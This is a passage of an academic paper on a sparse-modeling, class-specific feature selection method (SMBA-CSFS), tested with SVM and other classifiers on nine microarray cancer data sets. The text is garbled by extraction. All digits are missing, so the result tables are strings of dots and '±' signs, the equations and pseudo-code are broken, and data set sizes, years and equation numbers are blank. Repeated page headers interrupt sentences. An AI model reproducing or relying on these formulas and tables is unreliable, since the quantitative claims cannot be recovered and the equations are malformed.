×m matrix where n is the number observations and m is the num- ber of features θ={α,δ,ρ,η}, parameters vector output: i, set of features selected variables initialization while � >δ and t >ρ do βt+ ←(xt x+ρi)− θt+ ←(sλ/ρ(βt+ +µt/ρ)) µt+ ←µt +ρ(βt+ −θt+ ) �←compute_error(β,θ) end i ← find_representatives(θ,η) from a practical point of view, the optimization problem (eq. ( )) can be expressed by using the lagrange multipliers minimize c ‖x−xc‖ f +λ‖c‖ ,q subject to t c= t. ( ) in practice, the algorithm is implemented using an alternating direction method of multipliers (admm) optimization framework (boyd et al., ). in particular, the features of a given data set are obtained considering representatives of small pairwise coherence features as in a sparse dictionary learning method. it is worth observing the resemblance with the least absolute shrinkage and selection operator (lasso) (tibshirani, ). the latter consists of an approach to regression analysis that performs both variable selection and regularization in order to enhance the prediction accuracy and interpretation ability of the statistical model it produces. recall that the objective of lasso, in its basic form, is to solve minimize β n ∥∥y−xβ∥∥ subject to ‖β‖ ≤ t, ( ) where y =[y ,...,yn] is the n-dimensional vector of outcomes, x the covariate matrix, t is a free parameter that determines the amount of regularization and β is the sparse vector to estimate. from eq. ( ), one can observe that a sparse matrix can be estimated as in eq. ( ) by considering x itself as outcome and adding the affine constraint. in the following, the lasso will be used for classification tasks, adopting a sigmoid function, as it will be described in the experimental setup. nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm : sparse-modeling based approach for class-specific feature selection input : x = {x ,...,xn}data set y, class labels θ, smba parameters m, maximum number of features to select c, classifier model (e.g., svm, knn, etc) k, number of folds for performing k-cross validation output: acm, average classification metrics on k folds begin x ←data standardization x ←class balancing(x) by using smote chawla et al., x ←random shuffling(x) divide x into k folds foreach ki ∈k folds do set the ki fold as the test set xtest use the remaining k- folds as the train set xtrain perform the class-sample separation on the train set xtrain (note that i is the subset of features selected for each class ci ∈xtrain) foreach xci ∈xtrain do i ={ici ...icc}←smba(xci, θ) end for j← to m do build an ensemble classifier ej ={e ,j,...,ec,j}using the j-th selected feature ∈ ici and the classifier c foreach o∈xtest do (acmj)←use ej to classify the instance o end (acm)←(acmj) end end (acm)←average(acm) end a sparse-modeling based approach for class specific feature selection a general framework for class-specific feature selection (gf-csfs) is described in (pineda-bautista, carrasco-ochoa & martınez-trinidad, ). the proposed sparse- modeling based approach for class-specific feature selection (smba-csfs) tries to nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a sparse-modeling based approach for class-specific feature selection. full-size doi: . /peerjcs. /fig- best represent each class-sample set of an input data set by only using few representative features. more specifically, the method is made up of the following steps: . class-sample separation: unlike the gf-csfs, smba-csfs does not employ the class binarization stage to transform a c-class problem into c binary problems, instead it just uses a simple class-sample separation. basically, it consists of differentiating the samples among all the classes of the training set for a given data set into several disjoint sets/configurations of samples, one for each class (see fig. ). . class balancing: once the class sample set of the training set has been split apart (by applying the above class-sample separation step), it may be possible that each class- subset results unbalanced. therefore, the smote (chawla et al., ) re-sampling method is applied to balance each class-subset. technically speaking, it is important to point out that steps – are interchangeable, meaning that there are no differences in doing the first one before the other. . intra-class-specific feature selection: the sparse-modeling based approach is used for retrieving, minimizing eq. ( ), the most representative features for each class-sample set of the training set that best represent/reconstruct the whole class of objects. in doing so, the approach takes advantage of the intra-class properties for selecting the best feature subset (describing each class) which is used to improve the classification accuracy against tfs and gf-csfs. . classification: since the training set gets split into different class-sample subsets, we embraced the idea of using a wise-ensemble procedure for training a classification model for discriminating new incoming instances. as in pineda-bautista, carrasco-ochoa & martınez-trinidad ( ), given a class ci, a classifier ei is trained on the original data set only using the selected features for ci, for i= ,...,c. overall, an ensemble classifier e ={e ,...,ec} is constructed. in order to classify a new instance o through nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the ensemble, the natural dimension of o needs to be lowered to the dimension di of the classifier ei,i= ...,c. this way, for determining to which class o belongs to, an ad-hoc majority rule is used: (a) if a classifier outputs the same class for which the features, used for training ei were selected, i.e., the ei output is ci, then o belongs to ci. in case of a tie, i.e., when several classifiers respond ci, a majority vote is needed among all classifiers to determine the class of o. if still a tie occurs, o will belong to the class that received more votes among the tied classes. (b) if no classifier outputs the class whose selected features are used for training ei belongs to the class winning the majority voting. if there is a tie, then o will belong to the class that received more votes among the tied classes. finally, since a recursive tie may occur, in that case, the instance o would be classified as ci by randomly choosing a class among all the tied classes. the algorithm in fig. , illustrates the pseudo-code describing the csfs-smba procedure. basically, it first standardizes, class-balances and shuffles the data set x, then divides it into k folds, assigning the ki-th fold as test set xtest and the remaining k − folds as train set xtrain. the algorithm iteratively performs the task of class-sample separation, to split the sample belonging to different classes xci, on which the algorithm (illustrated in page ) is performed to output the m most representative features for each class (line ). the selected features are first used, one at time, for training an ensemble classifier ej, and later for classifying each instance o belonging to the test set xtest . finally, for all the ensemble models up to m selected features, the algorithm outputs the acm matrix, storing several model evaluation metrics. experimental results in the experiments, the smba-csfs performance have been assessed on nine publicly available microarray data sets. the classifiers used to determine the goodness of the selected feature subsets are a support vector machine (svm) with a linear kernel and parameter c = , a naive bayes, a k-nearest neighbors (knn) using k = , and a decision tree. data sets description in order to validate the introduced approach, a number of data sets exemplifying the typical data processing in the biological field are used in the experiments. in the following, a brief description of all the data sets employed in the experiments. . the allaml data set (golub et al., ) contains in total samples in classes: all and aml, which have and samples, respectively. every sample contains , gene expression values. . the leukemia data set (golub et al., ) contains in total samples in classes: acute lymphoblastic and acute myeloid. it is a modified version of the original allaml data set, where the original baseline genes ( , ) were cut off before further analysis. the number of genes that are used in the binary classification task is , . . the cll_sub_ data set (haslinger et al., ) has gene expressions from high density oligonucleotide arrays containing genetically and clinically distinct subgroups nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of b-cell chronic lymphocytic leukemia (b-cll). the data set consists of , attributes, instances and classes. . the glioma data set (nutt et al., ) contains in total samples in classes: cancer glioblastomas, non-cancer glioblastomas, cancer oligodendrogliomas and non-cancer oligodendrogliomas, which have , , , samples, respectively. each sample has , genes. after a preprocessing, the data set has been shrunk to samples and , genes. . the lung data set (bhattacharjee et al., ) contains in total samples in classes: adenocarcinomas, squamous cell lung carcinomas, pulmonary carcinoids, small-cell lung carcinomas and normal lung, with , , , , samples, respectively. the genes with standard deviations smaller than expression units were removed getting a data set with samples and , genes. . the lung_discrete data set (peng, long & ding, ) contains samples in classes where, each sample consists of gene expressions. the cardinalities of each sample in the lung_discrete data set are , , , , , , , respectively. . the dlbcl data set (alizadeh et al., ) is a modified version of the original dlbcl data set. it consists of samples in classes, where each sample is defined by the expression of , genes. the cardinalities of each sample in the dlbcl data set are , , , , , , , , , respectively. . the carcinom data set (su et al., ) contains samples in classes: prostate, bladder/ureter, breast, colorectal, gastroesophagus, kidney, liver, ovary, pancreas, lung adenocarcinomas and lung squamous cell carcinoma, with , , , , , , , , , , samples, respectively. after a preprocessing as described in yang et al. ( ), the data set has been shrunk to samples and , genes. . the gcm data set (ramaswamy et al., ) contains samples in classes: breast, prostate, lung, colorectal, lymphoma, bladder, melanoma, uterus, leukemia, renal, pancreas, ovary, mesothelioma and central nervous system, where each sample consist of , gene expression signatures. the cardinalities of each sample in the data set are , , , , , , , , , , , , , , respectively. all data sets are available at the following data repository (nardone, ciaramella & staiano, a). all the information about the data sets are summarized in table . experiment setup to validate the effectiveness of the smba-csfs model, it has been compared against several tfs and the gf-csfs proposed in pineda-bautista, carrasco-ochoa & martınez-trinidad ( ). smba-csfs is firstly compared against tfs methods and, since the framework in pineda-bautista, carrasco-ochoa & martınez-trinidad ( ) can use any tfs method as base for performing csfs, some experiments using both filter and wrapper methods (injection process) were made. in addition, the accuracy results were also compared against those obtained on the basis of all the features (bsl). the following tfs methods have been chosen for comparing purposes: nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table data sets description. size # features # classes allaml , leukemia , cll_sub_ , glioma , lung_c , lung_d dlbcl , carcinom , gcm , • lasso (tibshirani, ): lasso method involves penalizing the absolute size of the regression coefficients and it is usually used for creating parsimonious models in presence of a large number of features. the model implemented is a modified version of the classical lasso, adapted for classification purposes. in particular, in eq. ( ), the product xβ is transformed by a sigmoid function in order to address the classification problem. • en (zou & hastie, ): elastic net is a hybrid of ridge regression and lasso regularization. like lasso, elastic net can generate reduced models by achieving zero-valued coefficients. experimental studies have suggested that the elastic net technique can outperform lasso on data with highly correlated features. as for lasso, a modified version adapted for classification purposes has been implemented. • rfs (nie et al., ): robust feature selection method is a sparse based-learning approach for feature selection which emphasizes the joint ` , norm minimization on both loss and regularization function. • ls-` , (tang, alelyani & liu, ): ls-` , is a supervised sparse feature selection method. it exploits the` , -norm regularized regression model for joint feature selection, from multiple tasks where the classification objective function is a quadratic loss. • ll-` , (tang, alelyani & liu, ): ll-` , is a supervised sparse feature selection method which uses the same concept of ls-` , but instead uses a logistic loss as classification objective function. • fisher (gu, li & han, ): fisher is one of the most widely used supervised filter feature selection methods. it selects each feature as the ratio of inter-class separation and intraclass variance, where features are evaluated independently and, the final feature selection occurs by aggregating the m top ranked ones. • relief-f (kira & rendell, ; kononenko, ): relief-f is an iterative, randomized and supervised filter approach that estimates the quality of the features according to how well their values differentiate data samples that are near to each other; it does not discriminate among redundant features and performance decreases with few data. • mrmr (peng, long & ding, ): minimum-redundancy-maximum-relevance is a mutual information filter based algorithm which selects features according to the maximal statistical dependency criterion. nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • mi (kraskov, stögbauer & grassberger, ; ross, ): mutual information is a non-negative value, which measures the dependency between the variables. features are selected in a univariate way. the function relies on nonparametric methods based on entropy estimation from k-nearest neighbors distances. • smba: sparse-modeling based approach is nothing else that our smba-csfs model but that only takes into account the sdl strategy for selecting a subset of features considering all the classes in the feature selection process. we pre-processed all the data sets by using the z-score (kreyszig, ) normalization. to fairly compare the considered supervised feature selection methods, we have firstly tuned the parameters for all methods by using a ‘‘grid-search’’ strategy (tang, alelyani & liu, ) and finally, for evaluating the performance of all the methods, it has been considered a number of features ranging from to by performing a -fold cross validation (cv). the performance of the classification algorithms among all the methods have been evaluated by using the metrics of accuracy along with the standard deviations (acc ± std), precision (p), recall (r) and f-measure (f), which are computed as illustrated in sokolova & lapalme ( ). in addition, to give a better and summarized understanding between the performance of the models, we also computed the area under the curve (auc) and the receiver operating characteristic (roc) curves, where the former is a useful tool for evaluating the quality of class separation for a classifier while the latter makes it easier to compare the roc curve of one model to another. discussion the experiments have been performed on a workstation with a dual intel(r) xeon(r) . ghz and gb ram. the developed code is available at nardone, ciaramella & staiano ( b). for the sake of readability, all the results presented here account only for the svm classifier, since the performance proved that the proposed approach is a little sensitive to the choice of a specific classifier (indeed, the performance of each classifier are rather comparable). nevertheless, the interested reader may refer to the supplemental material for details on additional results concerning all the used classifiers. the experimental results on -fold cv for the svm classifier are summarized in tables – . figures – show all the accounted model evaluation metrics for the ten feature selection methods on the nine considered data sets. we compared the performance of our method against tfs methods (see tables – ) and gf-csfs framework (see tables – ). by looking at accuracy, precision, recall and f-measure, smba-csfs is able to better discriminate among the classes of the lung_c, lung_d, carcinom, dlblc and gcm data sets in most of the cases, when top and features are considered. in this latter case, when smba-csfs performs worse then its competitors, the corresponding performance tend to be comparable. on the remaining data sets, each with a number of classes less than , namely, allaml, leukemia, cll_sub_ and glioma, smba-csfs is instead outperformed by some of the competitors. consequently, we can assert that smba-csfs behaves better when working with data sets with many classes (at least ). one possible reason is due to the nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table svm accuracy results (acc ± std) on top features using -fold cv on different data sets. tfs methods are compared against our methods (smba and smba-csfs). fs: fisher score, mrmr: minimum-redundancy-maximum-relevance, mi: mutual information, rfs: robust feature selector, en: elastic net, bsl: all features. the best results are highlighted in bold. the number in parentheses is the number of features when the performance is achieved. average accuracy of top features (%) allaml leukemia cll_sub_ glioma lung_c lung_d dlbcl carcinom gcm fisher . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) relief . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) mrmr . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) mi . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) ls- . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) ll- ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) rfs ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) lasso . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) en . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) smba . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) smba-csfs . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) bsl . ± . . ± . . ± . ± . . ± . . ± . ± . . ± . ± . n ardone etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table svm precision(p), recall(r) and f-measure(f) on top features using -fold cv on different data sets. tfs methods are compared against our methods (smba and smba-csfs). fs: fisher score, mrmr: minimum-redundancy-maximum-relevance, mi: mutual information, rfs: robust feature selector, en: elastic net, bsl: all features. the best results are highlighted in bold. the number in parentheses is the number of features when the performance is achieved. allaml leukemia cll_sub_ glioma lung_c lung_d dlbcl carcinom gcm( ) p r f p r f p r f p r f p r f p r f p r f p r f p r f fisher . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . relief . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . mrmr . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . mi . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . ls_l . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . ll_l . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . rfs . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . lasso . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . en . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . smba . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . smba-csfs . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . bsl . . . . . . . . . . . . . . . n ardone etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table svm accuracy results (acc ± std) on top features using -fold cv on different data sets. gf-csfs (pineda-bautista, carrasco-ochoa & martınez- trinidad, ) framework is compared against our smba-csfs. fs: fisher score, mrmr: minimum-redundancy-maximum-relevance, mi: mutual information, rfs: robust feature selector, en: elastic net, bsl: all features. the best results are highlighted in bold. the number in parentheses is the number of features when the performance is achieved. average accuracy of top features (%) allaml leukemia cll_sub_ glioma lung_c lung_d dlbcl carcinom gcm fisher . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) relief . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) mrmr . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) mi . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) ls- . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) ll- . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) rfs . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) lasso . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) en . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) smba-csfs . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( )} . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) bsl . ± . . ± . . ± . ± . . ± . . ± . ± . . ± . ± . n ardone etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table svm precision(p), recall(r) and f-measure(f) on top features using -fold cv on different data sets. gf-csfs (pineda-bautista, carrasco-ochoa & martınez-trinidad, ) framework is compared against our smba-csfs. fs: fisher score, mrmr: minimum-redundancy-maximum-relevance, mi: mutual information, rfs: robust feature selector, en: elastic net, bsl: all features. the best results are highlighted in bold. the number in parentheses is the number of features when the performance is achieved. allaml leukemia cll_sub_ glioma lung_c lung_d dlbcl carcinom gcm( ) p r f p r f p r f p r f p r f p r f p r f p r f p r f fisher . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . relief . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . mrmr . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . mi . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . ls_l . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . ll_l . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . rfs . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . lasso . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . en . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . smba-csfs . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . bsl . . . . . . . . . . . . . . . n ardone etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of several tfs accuracies against smba and smba-csfs on nine data sets: (a) allaml( ), (b) leukemia( ), (c) cll_sub_ ( ), (d) glioma( ), (e) lung_c( ), (f) lung_d( ), (g) dlbcl( ), (h) carcinom( ), (i) gcm( ), when a varying number of features is selected. svm classifier with -fold cv was used. full-size doi: . /peerjcs. /fig- sparse-modeling approach in selecting the features and the use of an ensemble classifier. indeed, since the ensemble is based on a majority voting schema, smba-csfs is able to guess, with higher probability, the belonging of samples coming from data sets with many classes. just think that, whenever our method draws from a sample of a two-class data set, the probability of a right guess is proportional to a coin toss. therefore if, on one hand, this leads to good performance when the data set consists of many classes, the probability of failure, on the other hand, increases in the case of data sets consisting of fewer classes. anyhow, the local structure of data distribution which is crucial for feature selection, as stated in he, cai & niyogi ( ), may be a logical reason why the sbma schema performs better on certain data set rather than others. in addition, as shown in fig. , it is worth observing that smba-csfs seems to perform better w.r.t. tfs competitors on a fewer number of features. this would suggest that smba-csfs is able to identify/retrieve the most representative features that maximize the classification accuracy. to assert the nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average roc curves and the corresponding auc values on the first features compar- ing the classification performance among smba-csfs and tfs methods for nine data sets: (a) al- laml( ), (b) leukemia( ), (c) cll_sub_ ( ), (d) glioma( ), (e) lung_c( ), (f) lung_d( ), (g) dlbcl( ), (h) carcinom( ), (i) gcm( ). svm classifier with -fold cv was used. full-size doi: . /peerjcs. /fig- previous results achieved, we computed the average roc curves between smba-csfs and the other tfs methods on a subset of and features, respectively. looking at the auc values in fig. , it would suggest smba-csfs as the best model to choose for identifying the most representative features in a classification task when dealing with data set with many classes. concerning with the gf-csfs competitors, as shown in fig. , it would suggest that the sparse modeling process, underlying the proposed smba scheme for feature selection, is more suitable for retrieving the best features for the purpose of classification, often leading to get satisfactory results. such statement is also proved by the good balance between precision and recall shown in table and the average roc curves shown in fig. , where smba-csfs still holds a candle w.r.t. gf-csf methods. the reader’s attention is drawn to the supplemental material for all the experimental results and consideration arisen on the top features. to statistically validate the results and compare all the competing classifiers against the proposed smba-csfs, on both and feature subsets, we ran non-parametric multiple nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison of several csfs accuracies against smba-csfs on nine data sets: (a) allaml( ), (b) leukemia( ), (c) cll_sub_ ( ), (d) glioma( ), (e) lung_c( ), (f) lung_d( ), (g) dlbcl( ), (h) carcinom( ), (i) gcm( ), when a varying number of features is selected. svm classifier with -fold cv was used. full-size doi: . /peerjcs. /fig- comparison tests (all vs all) (demšar, ; rodríguez-fdez et al., ) which sequentially performs a popular multi-class friedman nonparametric test (friedman, ) followed by a nemenyi post-hoc multiple comparison (dunn, ). the ranking of the classifiers, when the top and features are selected, along with the corresponding p-values, are described in the supplemental material. looking at the cumulative rank (cr) for each classifier, one can notice how smba-csfs achieves optimal results, always finishing in the first three positions. however, it is worth emphasizing that our method ranks systematically on the top position when considering data sets consisting of five or more classes (named cr≥ ). these results prove again that smba-csfs achieves good performance on data sets with many classes. moreover, by using different classifiers we do not observe noteworthy differences in the results, meaning that the methodology is suitable for the classification of this kind of data, independently from the selected classifier. however, by looking at the p-values, corresponding to the single ranking method, one can better verify which algorithms have nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average roc curves and the corresponding auc values on the first features comparing the classification performance among smba-csfs and several csfs methods for nine data sets: (a) allaml( ), (b) leukemia( ), (c) cll_sub_ ( ), (d) glioma( ), (e) lung_c( ), (f) lung_d( ), (g) dlbcl( ), (h) carcinom( ), (i) gcm( ). svm classifier with -fold cv was used. full-size doi: . /peerjcs. /fig- significantly different performance w.r.t. smba-csfs. for detailed information regarding the results, see the supplemental material. concerning the computational complexity, from several conducted experiments we observed that the proposed methodology may be slower than other techniques (e.g., fs and relief whose running times are in term of few seconds) but comparable with smba. its running time, depending on several parameters involved, especially in the size of the number of instances and classes of the data sets, may vary from a couple of hours to at most one day (see table s for details on the computational time). nevertheless, smba-csfs achieves appreciable performance when working on large data sets and number of classes, and sometimes, in the biological field, the accuracy in finding key features that are responsible for some biological processes is preferred to the execution time. however, since most of the time consumed by the proposed approach is due to the solution of the optimization problem by using the admm method, and because the nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. methodology is based on an ensemble of classifiers, a parallel computing approach could be adopted to obtain a faster computational time (deng et al., ). conclusions we proposed a sparse-modeling based approach for feature selection with emphasizing joint ` , -norm minimization and the class-specific feature selection. experimental results, on nine different data sets, validate the unique aspects of smba-csfs and demonstrate the promising performance achieved against the-state-of-art methods. one of the main characteristics of our framework is that, by jointly exploiting the idea of sparse modeling and class-specific feature selection, it is able to identify/retrieve the most representative features that maximize the classification accuracy in those cases where a given data set is made up of many classes. based on our experimental results, we can conclude that, usually applying tfs allows achieving better results than using all the available features. however, in many cases, applying the proposed smba-csfs method allows improving the performance of just tfs as well as gf-csfs injected with several tfs methods. it has to be stressed, that smba-csfs seems actually suitable for large data sets consisting of many classes, while on data sets with less than five classes other methods appear to be more effective. although smba, smba-csfs and tfs performance slightly differ on the whole, it is worth highlighting that smba-csfs achieves its best performance when considering fewer features (i.e., from to ) on data sets with many classes, which is an important goal when certain biological tasks are taken into account. however, we do believe that these techniques might be effectively used in a systematic way after a microarray analysis. indeed, a better gene selection step could avoid the waste of many resources in post-array wet analysis (e.g., real time-pcr) allowing researchers to focus their attention just on relevant features. finally, we think this method demonstrated to be an interesting alternative among fs approaches on microarray data. as future work, the focus will be moved towards the biologic interpretations of the smba framework behavior, by systematically studying the selected genes, especially taking into account the smba-csfs approach which, as proved by the experimental results, is more effective in selecting genes of interest than the standard smba. furthermore, we are planning to test our approach on epic data set (demetriou et al., ), after a thorough analysis of pre-filtering, and a parallel implementation to substantially reduce its computational time. acknowledgements the research was entirely developed when davide nardone was a master degree student in applied computer science at university of naples parthenope. nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work was supported by dipartimento di scienze e tecnologie università degli studi di napoli ‘‘parthenope’’ (sostegno alla ricerca individuale per il triennio – project). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: dipartimento di scienze e tecnologie università degli studi di napoli ‘‘parthenope’’ (sostegno alla ricerca individuale per il triennio – project). competing interests the authors declare there are no competing interests. author contributions • davide nardone conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • angelo ciaramella and antonino staiano conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the data supporting the experiments in this article are available at zenodo: davide nardone. ( ). biological datasets for smba (version . . ). http://doi.org/ . / zenodo. . a python software package is available through github at https://github. com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature- selection, containing all the source codes used to run the software. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aharon m, elad m, bruckstein a. . k-svd: an algorithm for designing overcom- plete dictionaries for sparse representation. ieee transactions on signal processing ( ): – doi . /tsp. . . alizadeh aa, eisen mb, davis re, ma c, lossos is, rosenwald a, boldrick jc, sabet h, tran t, yu x, powell ji, yang l, marti ge, moore t, hudson jj, lu l, lewis db, nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection http://dx.doi.org/ . /peerj-cs. 